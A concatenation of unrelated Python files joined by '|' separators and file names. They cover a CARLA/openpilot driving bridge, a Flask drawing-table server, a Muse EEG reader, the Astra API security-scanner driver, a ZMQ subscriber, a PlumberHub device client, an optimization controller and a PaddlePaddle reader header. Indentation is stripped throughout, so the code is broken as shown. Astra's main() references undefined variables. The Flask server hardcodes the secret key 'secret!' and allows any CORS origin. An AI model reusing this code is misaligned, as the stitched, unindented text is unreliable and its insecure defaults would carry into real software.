throttle_op, brake_op, steer_torque_op = sendcan_function(sendcan)
# print(" === torq, ",steer_torque_op, " ===")
if is_openpilot_engaged:
fake_wheel.response(steer_torque_op * A_steer_torque, speed)
throttle_out = throttle_op * A_throttle
brake_out = brake_op * A_brake
steer_angle_out = fake_wheel.angle
# print(steer_torque_op)
# print(steer_angle_out)
vc = carla.VehicleControl(throttle=throttle_out, steer=steer_angle_out / 3.14, brake=brake_out, reverse=in_reverse)
vehicle.apply_control(vc)
rk.keep_time()
if __name__ == "__main__":
params = Params()
params.delete("Offroad_ConnectivityNeeded")
from selfdrive.version import terms_version, training_version
params.put("HasAcceptedTerms", terms_version)
params.put("CompletedTrainingVersion", training_version)
params.put("CommunityFeaturesToggle", "1")
params.put("CalibrationParams", '{"vanishing_point": [582.06, 442.78], "valid_blocks": 20}')
# no carla, still run
try:
import carla
except ImportError:
print("WARNING: NO CARLA")
while 1:
time.sleep(1)
from multiprocessing import Process, Queue
q = Queue()
p = Process(target=go, args=(q,))
p.daemon = True
p.start()
if args.joystick:
# start input poll for joystick
from lib.manual_ctrl import wheel_poll_thread
wheel_poll_thread(q)
else:
# start input poll for keyboard
from lib.keyboard_ctrl import keyboard_poll_thread
keyboard_poll_thread(q)
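# --- Hedged reference sketch (not part of the original script) of the control messages
# go(q) reads from the Queue; the helper name and values are illustrative, the message
# formats mirror the parsing in the main loop above. ---
def _example_control_messages(q):
  q.put("cruise_down")    # engage / set cruise (CruiseButtons.DECEL_SET)
  q.put("cruise_up")      # resume / accelerate (CruiseButtons.RES_ACCEL)
  q.put("throttle_50")    # manual throttle 50%; above 30% this cancels cruise
  q.put("brake_40")       # manual brake 40%; above 30% this cancels cruise
  q.put("steer_-15.0")    # manual steering angle override
  q.put("reverse")        # toggle reverse gear and cancel cruise
  q.put("cruise_cancel")  # disengage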
|
__init__.py
|
from server.utils.settings_utils import get_ip4_addresses
from flask import Flask, url_for
from flask.helpers import send_from_directory
from flask_socketio import SocketIO
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_cors import CORS
from werkzeug.utils import secure_filename
import os
from time import sleep, time
from dotenv import load_dotenv
import logging
from threading import Thread
from server.utils import settings_utils, software_updates, migrations
# Updating setting files (will apply changes only when a new SW version is installed)
settings_utils.update_settings_file_version()
# Show IPv4 addresses
print("\nTo run the server use 'ip:5000' in your browser with one of the following IP addresses: {}\n".format(str(get_ip4_addresses())), flush=True)
# Logging setup
load_dotenv()
level = os.getenv("FLASK_LEVEL")
if level is not None:
level = int(level)
else:
level = 0
settings_utils.print_level(level, "app")
logging.getLogger("werkzeug").setLevel(level)
# app setup
# uses the frontend build folder for the static path
app = Flask(__name__, template_folder='templates', static_folder="../frontend/build", static_url_path="/")
app.config['SECRET_KEY'] = 'secret!' # TODO put a key here
app.config['UPLOAD_FOLDER'] = "./server/static/Drawings"
socketio = SocketIO(app, cors_allowed_origins="*")
CORS(app) # setting up cors for react
#
@app.route('/Drawings/<path:filename>')
def base_static(filename):
filename = secure_filename(filename)
return send_from_directory(app.root_path + app.config['UPLOAD_FOLDER'].replace("./server", "")+ "/{}/".format(filename), "{}.jpg".format(filename))
# database
file_path = os.path.join(os.path.abspath(os.getcwd()), "database.db")
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///'+file_path
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
migrate = Migrate(app, db, include_object=migrations.include_object)
# After setting up the database it is possible to import the app components
import server.api.drawings
import server.sockets_interface.socketio_callbacks
from server.sockets_interface.socketio_emits import SocketioEmits
from server.hw_controller.queue_manager import QueueManager
from server.hw_controller.feeder import Feeder
from server.hw_controller.feeder_event_manager import FeederEventManager
# Commenting out leds part. TODO finish the leds part
# Needs to uncomment also in the socket callbacks: in settings_save and in leds_set_color
#from server.hw_controller.leds.leds_controller import LedsController
#from server.hw_controller.leds.leds_driver import LedsDriver
# Initializes sockets emits
app.semits = SocketioEmits(app,socketio, db)
# Device controller initialization
app.feeder = Feeder(FeederEventManager(app))
#app.feeder.connect()
app.qmanager = QueueManager(app, socketio)
#app.leds_controller = LedsController(app)
#app.leds_controller.start()
# Get the latest commit short hash to use as a version to refresh cached files
sw_version = software_updates.get_commit_shash()
@app.context_processor
def override_url_for():
return dict(url_for=versioned_url_for)
# Adds a version number to the static url to update the cached files when a new version of the software is loaded
def versioned_url_for(endpoint, **values):
if endpoint == 'static':
values["version"] = sw_version
return url_for(endpoint, **values)
# Home routes
@app.route('/')
def home():
return send_from_directory(app.static_folder, "index.html")
# Starting the feeder after the server is ready to avoid problems with the web page not showing up
def run_post():
sleep(2)
app.feeder.connect()
th = Thread(target = run_post)
th.name = "feeder_starter"
th.start()
if __name__ == '__main__':
socketio.run(app)
|
extract.py
|
from .muse import Muse
from .models import Sample
import time
from multiprocessing import Process, Queue
def _target(queue, address=None, backend=None, interface=None, name=None):
def add_to_queue(data, timestamps):
for i in range(12):
queue.put(Sample(timestamps[i], data[:, i]))
try:
muse = Muse(
address=address,
callback=add_to_queue,
backend=backend,
interface=interface,
name=name
)
muse.connect()
muse.start()
try:
while True:
time.sleep(1)
finally:
muse.stop()
muse.disconnect()
except Exception as e:
queue.put(e)
def get_raw(timeout=15, **kwargs):
q = Queue()
p = Process(target=_target, args=(q,), kwargs=kwargs)
p.daemon = True
p.start()
while True:
item = q.get(timeout=timeout)
if isinstance(item, Exception):
raise item
else:
yield item
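# --- Hedged usage sketch (not part of the original module); the keyword arguments
# (device address, backend, etc.) are omitted here and the sample count is an
# illustrative choice. ---
if __name__ == "__main__":
    # get_raw() runs the Muse connection in a child process and yields Sample
    # objects from the queue; exceptions raised in the child are re-raised here.
    for i, sample in enumerate(get_raw(timeout=15)):
        print(sample)
        if i >= 99:  # stop after 100 samples
            break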
|
astra.py
|
import argparse
import base64
import json
import requests
import time
import ast
import utils.logger as logger
import utils.logs as logs
import urlparse
import hashlib
import webbrowser
from core.zapscan import *
from core.parsers import *
from utils.logger import *
from core.login import APILogin
from utils.logger import logger
from utils.config import update_value,get_value,get_allvalues
from modules.cors import cors_main
from modules.auth import auth_check
from modules.rate_limit import rate_limit
from modules.csrf import csrf_check
from modules.jwt_attack import jwt_check
from modules.sqli import sqli_check
from modules.xss import xss_check
from modules.redirect import open_redirect_check
from modules.xxe import xxe_scan
from modules.crlf import crlf_check
from core.zap_config import zap_start
from multiprocessing import Process
from utils.db import Database_update
if os.getcwd().split('/')[-1] != 'API':
from API.api import main
dbupdate = Database_update()
def parse_collection(collection_name,collection_type):
if collection_type == 'Postman':
parse_data.postman_parser(collection_name)
else:
print "[-]Failed to Parse collection"
sys.exit(1)
def scan_complete():
print "[+]Scan has been completed"
webbrowser.open("http://127.0.0.1:8094/reports.html#"+scanid)
while True:
pass
def generate_scanid():
global scanid
scanid = hashlib.md5(str(time.time())).hexdigest()
return scanid
def add_headers(headers):
    # This function deals with adding custom headers and the auth value.
auth_type = get_value('config.property','login','auth_type')
if auth_type == 'cookie':
cookie = get_value('config.property','login','cookie')
if cookie:
cookie_dict = ast.literal_eval(cookie)
cookie_header = {'Cookie': cookie_dict['cookie']}
headers.update(cookie_header)
else:
auth_success = get_value('config.property','login','auth_success')
if auth_success == 'Y':
auth_success_token = get_value('config.property','login','auth_success_token')
#auth_request_header = get_value('config.property','login','auth_request_token')
auth_success_param = get_value('config.property','login','auth_success_param')
auth_header = {auth_success_param : auth_success_token }
headers.update(auth_header)
try:
custom_header = get_value('config.property','login','headers')
custom_header = ast.literal_eval(custom_header)
headers.update(custom_header)
except:
pass
return headers
def read_scan_policy():
try:
scan_policy = get_value('scan.property','scan-policy','attack')
attack = ast.literal_eval(scan_policy)
except Exception as e:
print e
print "Failed to parse scan property file."
return attack
def update_scan_status(scanid, module_name=None, count=None):
#Update scanning status and total scan of module into DB.
time.sleep(3)
if count is not None:
dbupdate.update_scan_record({"scanid": scanid}, {"$set" : {"total_scan" : count}})
else:
dbupdate.update_scan_record({"scanid": scanid}, {"$set" : {module_name : "Y"}})
def modules_scan(url,method,headers,body,scanid=None):
'''Scanning API using different engines '''
attack = read_scan_policy()
if attack is None:
print "Failed to start scan."
sys.exit(1)
if scanid is not None:
count = 0
for key,value in attack.items():
if value == 'Y' or value =='y':
count += 1
update_scan_status(scanid,"",count)
if attack['zap'] == "Y" or attack['zap'] == "y":
api_scan = zap_scan()
status = zap_start()
if status is True:
api_scan.start_scan(url,method,headers,body,scanid)
# Custom modules scan
if attack['cors'] == 'Y' or attack['cors'] == 'y':
cors_main(url,method,headers,body,scanid)
update_scan_status(scanid, "cors")
if attack['Broken auth'] == 'Y' or attack['Broken auth'] == 'y':
auth_check(url,method,headers,body,scanid)
update_scan_status(scanid, "auth")
if attack['Rate limit'] == 'Y' or attack['Rate limit'] == 'y':
rate_limit(url,method,headers,body,scanid)
update_scan_status(scanid, "Rate limit")
if attack['csrf'] == 'Y' or attack['csrf'] == 'y':
csrf_check(url,method,headers,body,scanid)
update_scan_status(scanid, "csrf")
if attack['jwt'] == 'Y' or attack['jwt'] == 'y':
jwt_check(url,method,headers,body,scanid)
update_scan_status(scanid, "jwt")
if attack['sqli'] == 'Y' or attack['sqli'] == 'y':
sqli_check(url,method,headers,body,scanid)
update_scan_status(scanid, "sqli")
if attack['xss'] == 'Y' or attack['xss'] == 'y':
xss_check(url,method,headers,body,scanid)
update_scan_status(scanid, "xss")
if attack['open-redirection'] == 'Y' or attack['open-redirection'] == 'y':
open_redirect_check(url,method,headers,body,scanid)
update_scan_status(scanid, "open-redirection")
if attack['xxe'] == 'Y' or attack['xxe'] == 'y':
xxe = xxe_scan()
xxe.xxe_test(url,method,headers,body,scanid)
update_scan_status(scanid, "xxe")
if attack['crlf'] == 'Y' or attack['crlf'] == 'y':
crlf_check(url,method,headers,body,scanid)
update_scan_status(scanid, "crlf")
def validate_data(url,method):
''' Validate HTTP request data and return boolean value'''
validate_url = urlparse.urlparse(url)
    http_method = ['GET','POST','DELETE','OPTIONS','PUT']
if method in http_method and bool(validate_url.scheme) is True:
validate_result = True
else:
validate_result = False
return validate_result
def scan_single_api(url, method, headers, body, api, scanid=None):
''' This function deals with scanning a single API. '''
if headers is None or headers == '':
headers = {'Content-Type' : 'application/json'}
try:
# Convert header and body in dict format
if type(headers) is not dict:
headers = ast.literal_eval(headers)
if body:
if type(body) is not dict:
body = ast.literal_eval(body)
except:
return False
if method == '':
method = 'GET'
result = validate_data(url, method)
if result is False:
print "[-]Invalid Arguments"
return False
if api == "Y":
p = Process(target=modules_scan,args=(url,method,headers,body,scanid),name='module-scan')
p.start()
if api == "Y":
return True
else:
modules_scan(url,method,headers,body,scanid)
def scan_core(collection_type,collection_name,url,headers,method,body,loginurl,loginheaders,logindata,login_require):
''' Scan API through different engines '''
scanid = generate_scanid()
if collection_type and collection_name is not None:
parse_collection(collection_name,collection_type)
if login_require is True:
api_login.verify_login(parse_data.api_lst)
for data in parse_data.api_lst:
try:
url = data['url']['raw']
except:
url = data['url']
headers,method,body = data['headers'],data['method'],''
if headers:
try:
headers = add_headers(headers)
except:
pass
if data['body'] != '':
body = json.loads(base64.b64decode(data['body']))
modules_scan(url,method,headers,body,scanid)
else:
print "%s [-]Invalid Collection. Please recheck collection Type/Name %s" %(api_logger.G, api_logger.W)
def get_arg(args=None):
parser = argparse.ArgumentParser(description='Astra - REST API Security testing Framework')
parser.add_argument('-c', '--collection_type',
help='Type of API collection',
default='Postman')
parser.add_argument('-n', '--collection_name',
help='Type of API collection')
parser.add_argument('-u', '--url',
help='URL of target API')
parser.add_argument('-headers', '--headers',
help='Custom headers.Example: {"token" : "123"}')
parser.add_argument('-method', '--method',
help='HTTP request method',
default='GET',choices=('GET', 'POST', 'PUT','DELETE'))
parser.add_argument('-b', '--body',
help='Request body of API')
parser.add_argument('-l', '--loginurl',
help='URL of login API')
parser.add_argument('-H', '--loginheaders',
help='Headers should be in a dictionary format. Example: {"accesstoken" : "axzvbqdadf"}')
parser.add_argument('-d', '--logindata',
help='login data of API')
results = parser.parse_args(args)
if len(args) == 0:
print "%sAt least one argument is needed to procced.\nFor further information check help: %spython astra.py --help%s"% (api_logger.R, api_logger.G, api_logger.W)
sys.exit(1)
return (results.collection_type,
results.collection_name,
results.url,
results.headers,
results.method,
results.body,
results.loginurl,
results.loginheaders,
results.logindata,
)
def main():
collection_type,collection_name,url,headers,method,body,loginurl,loginheaders,logindata = get_arg(sys.argv[1:])
if loginheaders is None:
loginheaders = {'Content-Type' : 'application/json'}
if collection_type and collection_name and loginurl and loginmethod and logindata:
# Login data is given as an input.
api_login.fetch_logintoken(loginurl,loginmethod,loginheaders,logindata)
login_require = False
elif collection_type and collection_name and loginurl:
# This will first find the given loginurl from collection and it will fetch auth token.
parse_collection(collection_name,collection_type)
try:
            loginurl,loginheaders,loginmethod,logindata = api_login.parse_logindata(loginurl)
except:
print "[-]%s Failed to detect login API from collection %s " %(api_logger.R, api_logger.W)
sys.exit(1)
api_login.fetch_logintoken(loginurl,loginmethod,loginheaders,logindata)
login_require = False
elif loginurl and loginmethod:
api_login.fetch_logintoken(loginurl,loginmethod,loginheaders,logindata)
login_require = False
elif collection_type and collection_name and headers:
#Custom headers
update_value('login','header',headers)
login_require = False
elif url and collection_name and headers:
#Custom headers
update_value('login','header',headers)
login_require = False
elif url:
if headers is None:
headers = {'Content-Type' : 'application/json'}
if method is None:
method = "GET"
login_require = False
else:
login_require = True
if body:
body = ast.literal_eval(body)
# Configuring ZAP before starting a scan
get_auth = get_value('config.property','login','auth_type')
if collection_type and collection_name is not None:
scan_core(collection_type,collection_name,url,headers,method,body,loginurl,loginheaders,logindata,login_require)
else:
scanid = generate_scanid()
scan_single_api(url, method, headers, body, "F", scanid)
scan_complete()
if __name__ == '__main__':
api_login = APILogin()
parse_data = PostmanParser()
api_logger = logger()
api_logger.banner()
main()
|
subscribers.py
|
import zmq
from .sockets import ClientConnection
from .constants import *
import threading
def subscriber(address,topics,callback,message_type):
"""
    Creates a subscriber bound to the given address and
    subscribed to the given topics.
    The callback is invoked for every message received.
    Args:
    - address: the address to bind the SUB socket to.
    - topics: the topics to subscribe to
- callback: the callback to invoke for every message. Must accept 2 variables - topic and message
- message_type: the type of message to receive
"""
return Subscriber(address,topics,callback,message_type)
class Subscriber(ClientConnection):
"""
Subscriber that can read messages from ZMQ
Args:
- address: the address to bind to
- topics: the topics to subscribe
- callback: the callback to invoke for every message
- message_type: the type of message to receive
"""
def __init__(self,address,topics,callback,message_type):
self._active = True
self._topics = topics
self._callback = callback
self._message_type = message_type
super(Subscriber,self).__init__(address,zmq.SUB)
for topic in self._topics:
self._sock.setsockopt_string(zmq.SUBSCRIBE,topic)
def _consume(self):
while self._active:
try:
topic, message=super(Subscriber,self).receive(self._message_type)
#process the message
self._callback(topic,message)
except zmq.ZMQError:
pass
def start(self):
"""
Start a thread that consumes the messages and invokes the callback
"""
t=threading.Thread(target=self._consume)
t.start()
def stop(self):
"""
Stop the consumer thread
"""
self._active = False
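# --- Hedged usage sketch (not part of the original module); the address, topic and
# message type below are illustrative assumptions (the accepted message types are
# defined by ClientConnection.receive, which is not shown here). ---
if __name__ == "__main__":
    def on_message(topic, message):
        print(topic, message)
    sub = subscriber("tcp://127.0.0.1:5556", ["example-topic"], on_message, "json")
    sub.start()  # consumes messages on a background thread
    # ... later: sub.stop() to end the consumer loop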
|
Client.py
|
import requests
import websockets
import asyncio
import threading
from .plumberhub_pb2 import Sample
from .plumberhub_pb2 import Event
def noop():
pass
class PlumberHubClient:
def __init__(
self,
hostname, port, client_id,
onready = noop,
onsample=noop, onevent = noop,
onerror=noop, onclose=noop
):
host = hostname + ':' + str(port)
self._base_url = 'http://' + host + '/api/sdk/client/' + client_id
self._running = True
self.onsample = onsample
self.onevent = onevent
self.onerror = onerror
self.onclose = onclose
self.onready = onready
# Fetching ticket
# Establishing Data / Event Channel - websocket
def listen_data(loop):
dataresponse = requests.post(self._base_url + '/session/data/ticket')
            datacredential = dataresponse.json()['credential']
            ws_url = 'ws://' + host + '/client/' + client_id + '/session/data?credential=' + datacredential
asyncio.set_event_loop(loop)
async def sample_handler():
async with websockets.connect(uri=ws_url) as ws:
while self._running:
sample = Sample()
sample.MergeFromString(await ws.recv())
self.onsample(sample)
loop.run_until_complete(sample_handler())
onclose()
def listen_event(loop):
eventresponse = requests.post(self._base_url + '/session/event/ticket')
eventcredential = eventresponse.json()['credential']
ws_url = 'ws://' + host + '/client/' + client_id + '/session/event?credential=' + eventcredential
asyncio.set_event_loop(loop)
async def event_handler():
async with websockets.connect(uri=ws_url) as ws:
while self._running:
event = Event()
event.MergeFromString(await ws.recv())
self.onevent(event)
loop.run_until_complete(event_handler())
datathread = asyncio.new_event_loop()
eventthread = asyncio.new_event_loop()
listening_datathread = threading.Thread(target=listen_data, args=(datathread,))
listening_datathread.start()
listening_eventthread = threading.Thread(target=listen_event, args=(eventthread,))
listening_eventthread.start()
def close(self):
self._running = False
def is_master(self):
response = requests.get(self._base_url + '/profile')
if response.status_code == 200:
return response.json()['isMaster']
def get_device(self):
response = requests.get(self._base_url + '/device')
if response.status_code == 200:
return response.json()
# Low-level to getting/setting device state.
def _state(self):
return self._base_url + '/device/state/'
def get(self, key):
response = requests.get(self._state() + key)
if response.status_code == 200:
return response.json()['value']
def set(self, key, value):
response = requests.put(self._state() + key, {'value': value})
if response.status_code == 200:
return response.json()['value']
# Set sampling on/off
def _busy(self):
return self._base_url + '/device/busy'
def start(self):
response = requests.put(self._busy(), json = {'value': True})
if response.status_code == 200:
return response.json()['value']
def stop(self):
response = requests.put(self._busy(), json = {'value': False})
if response.status_code == 200:
return response.json()['value']
# Sampling rate getter/setter
def _sampling_rate(self):
return self._base_url + '/device/sampling-rate'
def get_sampling_rate(self):
response = requests.get(self._sampling_rate())
if response.status_code == 200:
return response.json()['value']
def set_sampling_rate(self, value):
response = requests.put(self._sampling_rate(), {'value': value})
if response.status_code == 200:
return response.json()['value']
# Gain getter/setter
def _gain(self):
return self._base_url + '/device/gain'
def get_gain(self):
response = requests.get(self._gain())
if response.status_code == 200:
return response.json()['value']
def set_gain(self, value):
response = requests.put(self._gain(), {'value': value})
if response.status_code == 200:
return response.json()['value']
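# --- Hedged usage sketch (not part of the original module); hostname, port and
# client_id are illustrative assumptions. ---
if __name__ == "__main__":
    def on_sample(sample):
        print("sample:", sample)
    def on_event(event):
        print("event:", event)
    client = PlumberHubClient(
        hostname="127.0.0.1", port=8080, client_id="example-client-id",
        onsample=on_sample, onevent=on_event,
    )
    client.start()  # PUT /device/busy {'value': True} - begin sampling
    # ... samples and events arrive via the websocket listener threads ...
    client.stop()   # PUT /device/busy {'value': False}
    client.close()  # ends the listener loops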
|
optimization_controller.py
|
import json
import signal
import threading
import connexion
import re
import os
import subprocess
import time
import gc
import psutil
from IO.MQTTClient import InvalidMQTTHostException
from IO.redisDB import RedisDB
from optimization.ModelException import InvalidModelException, MissingKeysException
from swagger_server.controllers.threadFactory import ThreadFactory
from swagger_server.models.start import Start # noqa: E501
from swagger_server.models.status_output import StatusOutput # noqa: E501
from optimization.idStatusManager import IDStatusManager
from utils_intern.constants import Constants
from utils_intern.messageLogger import MessageLogger
logger = MessageLogger.get_logger_parent()
class CommandController:
_instance = None
_lock = threading.Lock()
def __new__(cls):
if CommandController._instance is None:
with CommandController._lock:
if CommandController._instance is None:
CommandController._instance = super(CommandController, cls).__new__(cls)
return CommandController._instance
def __init__(self):
self.factory = {}
self.statusThread = {}
self.running = {}
self.redisDB = RedisDB()
self.lock_key = "id_lock"
def set(self, id, object):
self.factory[id] = object
def get_length_factory(self):
return len(self.factory)
def get(self, id):
return self.factory[id]
def set_isRunning(self, id, bool):
self.running[id] = bool
def isRunningExists(self):
logger.debug("IsRunning exists: " + str(len(self.running)))
if len(self.running):
return True
else:
return False
def get_isRunning(self, id):
if id in self.running.keys():
return self.running[id]
else:
return False
def get_running(self):
return self.running
def get_statusThread(self, id):
return self.statusThread[id]
def start(self, id, json_object, dict_object=None):
logger.debug(str(json_object))
if json_object is not None:
self.model_name = json_object.model_name
self.control_frequency = json_object.control_frequency
self.horizon_in_steps = json_object.horizon_in_steps
self.dT_in_seconds = json_object.d_t_in_seconds
self.repetition = json_object.repetition
self.solver = json_object.solver
self.optimization_type = json_object.optimization_type
self.single_ev = json_object.single_ev
elif dict_object is not None:
self.model_name = dict_object["model"]
self.control_frequency = dict_object["control_frequency"]
self.horizon_in_steps = dict_object["horizon_in_steps"]
self.dT_in_seconds = dict_object["dT_in_seconds"]
self.repetition = dict_object["repetition"]
self.solver = dict_object["solver"]
self.optimization_type = dict_object["optimization_type"]
self.single_ev = dict_object["single_ev"]
self.set(id,
ThreadFactory(self.model_name, self.control_frequency, self.horizon_in_steps, self.dT_in_seconds,
self.repetition, self.solver, id, self.optimization_type, self.single_ev))
logger.info("Thread: " + str(self.get(id)))
self.redisDB.set("run:" + id, "starting")
msg = self.get(id).startOptControllerThread()
logger.debug("Answer from Thread factory" + str(msg))
if msg == 0:
self.set_isRunning(id, True)
logger.debug("Flag isRunning set to True")
self.statusThread[id] = threading.Thread(target=self.run_status, args=(id,))
logger.debug("Status of the Thread started")
self.statusThread[id].start()
meta_data = {"id": id,
"model": self.model_name,
"control_frequency": self.control_frequency,
"horizon_in_steps": self.horizon_in_steps,
"dT_in_seconds": self.dT_in_seconds,
"repetition": self.repetition,
"solver": self.solver,
"optimization_type": self.optimization_type,
"single_ev": self.single_ev,
"ztarttime": time.time()}
self.redisDB.set("run:" + id, "running")
IDStatusManager.persist_id(id, True, meta_data, self.redisDB)
logger.info("running status " + str(self.running))
logger.debug("Command controller start finished")
return 0
else:
self.set_isRunning(id, False)
logger.debug("Flag isRunning set to False")
IDStatusManager.persist_id(id, False, None, self.redisDB)
self.factory[id].stopOptControllerThread()
self.redisDB.set("run:" + id, "stopped")
logger.error("Command controller start could not be finished")
# logger.debug("System stopped succesfully")
return 1
def stop(self, id):
logger.debug("Stop signal received")
logger.debug("This is the factory object: " + str(self.get(id)))
if self.factory[id]:
IDStatusManager.persist_id(id, False, None, self.redisDB)
self.factory[id].stopOptControllerThread()
del self.factory[id]
del self.statusThread[id]
#self.stop_pyro_servers()
#self.stop_name_servers()
self.set_isRunning(id, False)
message = "System stopped succesfully"
self.redisDB.set("run:" + id, "stopped")
logger.debug(message)
gc.collect()
else:
message = "No threads found"
logger.debug(message)
def run_status(self, id):
while True:
status = self.get(id).is_running()
flag = self.redisDB.get("run:" + id)
if not status or (flag is not None and flag == "stop"):
self.redisDB.set("run:" + id, "stopping")
self.stop(id)
break
time.sleep(1)
def restart_ids(self):
old_ids, stopped_ids = IDStatusManager.instances_to_restart(self.redisDB)
for s in old_ids:
val = json.loads(s)
try:
self.start(val["id"], None, val)
except (InvalidModelException, MissingKeysException, InvalidMQTTHostException) as e:
# TODO: should we catch these exceptions here?
logger.error("Error " + str(e))
self.redisDB.set("run:" + val["id"], "stopped")
return str(e)
for s in stopped_ids:
val = json.loads(s)
id = val["id"]
self.redisDB.set("run:" + id, "stopped")
self.redisDB.set(Constants.id_meta + ":" + id, json.dumps(val))
def get_status(self):
status = {}
keys = self.redisDB.get_keys_for_pattern("run:*")
if keys is not None:
for key in keys:
value = self.redisDB.get(key)
id = key[4:]
status[id] = {}
if value is None or (value is not None and value == "stopped"):
status[id]["status"] = "stopped"
elif value == "running":
status[id]["status"] = "running"
elif value == "stop" or value == "stopping":
status[id]["status"] = "stopping"
elif value == "starting":
status[id]["status"] = "starting"
keys = self.redisDB.get_keys_for_pattern(Constants.id_meta + ":*")
if keys is not None:
for key in keys:
value = self.redisDB.get(key)
id = key[8:]
if id not in status.keys():
status[id] = {}
status[id]["status"] = "stopped"
status[id]["config"] = {}
if value is not None:
status[id]["config"].update(json.loads(value))
# logger.debug("status id config "+str(status))
if "ztarttime" in status[id]["config"].keys():
status[id]["start_time"] = status[id]["config"]["ztarttime"]
status[id]["config"].pop("ztarttime")
if "model" in status[id]["config"].keys():
status[id]["config"]["model_name"] = status[id]["config"]["model"]
status[id]["config"].pop("model")
return status
variable = CommandController()
variable.restart_ids()
def get_models():
f = []
mypath = "/usr/src/app/optimization/models"
for (dirpath, dirnames, filenames) in os.walk(mypath):
f.extend(filenames)
break
f_new = []
for filenames in f:
filenames = re.sub('.py', '', str(filenames))
f_new.append(filenames)
logger.debug("available models = " + str(f_new))
return f_new
def framework_start(id, startOFW): # noqa: E501
"""Command for starting the framework
# noqa: E501
:param id: Id of the registry to be started
:type id: str
:param startOFW: Start command for the optimization framework repetitions: -1 infinite repetitions
:type startOFW: dict | bytes
:rtype: None
"""
available_solvers = ["ipopt", "glpk", "bonmin", "gurobi", "cbc"]
available_optimizers = ["discrete", "stochastic", "MPC"]
response_msg = ""
response_code = 200
if connexion.request.is_json:
logger.info("Starting the system")
startOFW = Start.from_dict(connexion.request.get_json())
models = get_models()
if startOFW.model_name != "" and startOFW.model_name not in models:
response_msg = "Model not available. Available models are :" + str(models)
response_code = 400
elif startOFW.solver not in available_solvers:
response_msg = "Use one of the following solvers :" + str(available_solvers)
response_code = 400
elif startOFW.optimization_type not in available_optimizers:
response_msg = "Use one of the following optimizer types : " + str(available_optimizers)
response_code = 400
else:
dir = os.path.join(os.getcwd(), "optimization/resources", str(id))
if not os.path.exists(dir):
response_msg = "Id not existing"
response_code = 400
else:
redis_db = RedisDB()
flag = redis_db.get("run:" + id)
if flag is not None and flag == "running":
response_msg = "System already running"
else:
try:
msg = variable.start(id, startOFW)
if msg == 0:
response_msg = "System started succesfully"
else:
response_msg = "System could not start"
response_code = 400
except (InvalidModelException, MissingKeysException, InvalidMQTTHostException) as e:
logger.error("Error " + str(e))
redis_db.set("run:" + id, "stopped")
response_msg = str(e)
response_code = 400
else:
response_msg = "Wrong Content-Type"
response_code = 400
logger.error("Wrong Content-Type")
return response_msg, response_code
# return 'System started succesfully'
def framework_status(): # noqa: E501
"""Command for getting status of the framework
# noqa: E501
:rtype: StatusOutput
"""
results = variable.get_status()
answer_dict = {}
if len(results) > 0:
answer_dict["status"] = results
response = StatusOutput.from_dict(answer_dict)
del results
del answer_dict
# logger.debug("response: " + str(response2))
return response
def framework_stop(id): # noqa: E501
"""Command for stoping the framework
# noqa: E501
:param id: Id of the registry to be stopped
:type id: str
:rtype: None
"""
try:
redis_db = RedisDB()
flag = redis_db.get("run:" + id)
logger.debug("Flag " + str(flag))
message = ""
code = 200
if flag is not None and flag == "running":
logger.debug("System running and trying to stop")
redis_db.set("run:" + id, "stop")
time.sleep(1)
flag = redis_db.get("run:" + id)
logger.debug("Flag in stop: " + str(flag))
if flag is "stopped" or None: # TODO: is none necessary?
logger.debug("System stopped succesfully")
message = "System stopped succesfully"
elif "stopping" in flag:
message = "System stopped succesfully"
counter = 0
while ("stopping" in flag):
flag = redis_db.get("run:" + id)
counter = counter + 1
if counter >= 15:
message = "system stopped succesfully"
break
else:
time.sleep(1)
logger.debug("System stopped succesfully")
else:
message = "Problems while stopping the system"
code = 500
elif flag is not None and flag == "stopped":
logger.debug("System already stopped")
message = "System already stopped"
elif flag is None:
logger.debug("System already stopped")
message = "System already stopped"
except Exception as e:
logger.error(e)
message = "Error stoping the system"
code = 500
return message, code
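# --- Hedged reference sketch (not part of the original module) of the configuration
# dict accepted by CommandController.start(id, None, dict_object) and persisted for
# restart_ids(); the concrete values are illustrative assumptions. ---
example_start_config = {
    "id": "example-instance",
    "model": "example_model",     # must name a file in optimization/models (see get_models)
    "control_frequency": 60,
    "horizon_in_steps": 24,
    "dT_in_seconds": 3600,
    "repetition": -1,             # -1 means infinite repetitions
    "solver": "ipopt",            # one of: ipopt, glpk, bonmin, gurobi, cbc
    "optimization_type": "MPC",   # one of: discrete, stochastic, MPC
    "single_ev": False,
}
# variable.start(example_start_config["id"], None, example_start_config)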
|
reader.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import core
import sys
import six
import numpy as np
import threading
import paddle
from .framework import Program, Variable, program_guard, default_main_program, default_startup_program, in_dygraph_mode, cpu_places, _current_expected_place
from .executor import global_scope
from .data_feeder import DataFeeder, BatchedTensorProvider
from .multiprocess_utils import multiprocess_queue_set, CleanupFuncRegistrar, _cleanup_mmap, _cleanup, _set_SIGCHLD_handler
from .dataloader import BatchSampler, Dataset, IterableDataset
from .dataloader.dataloader_iter import _DataLoaderIterSingleProcess, _DataLoaderIterMultiProcess, _DatasetKind, default_collate_fn
from .dataloader.batch_sampler import _InfiniteIterableSampler
from .layers.io import monkey_patch_reader_methods, _copy_reader_var_, double_buffer
from .unique_name import UniqueNameGenerator
import logging
import warnings
### Dygraph DataLoader configs ###
import os
import multiprocessing
import signal
# NOTE: queue has a different name in python2 and python3
if six.PY2:
import Queue as queue
else:
import queue
# NOTE: [ avoid hanging & failed quickly ] This value is used when getting data from another process
QUEUE_GET_TIMEOUT = 60
__all__ = ['PyReader', 'DataLoader', 'default_collate_fn']
data_loader_unique_name_generator = UniqueNameGenerator()
KEEP_DATA_LOADER_ORDER = True
USE_PINNED_MEMORY = None
def keep_data_loader_order(*args):
global KEEP_DATA_LOADER_ORDER
if len(args) == 0:
return KEEP_DATA_LOADER_ORDER
else:
assert len(args) == 1 and isinstance(args[0], bool)
KEEP_DATA_LOADER_ORDER = args[0]
def use_pinned_memory(*args):
global USE_PINNED_MEMORY
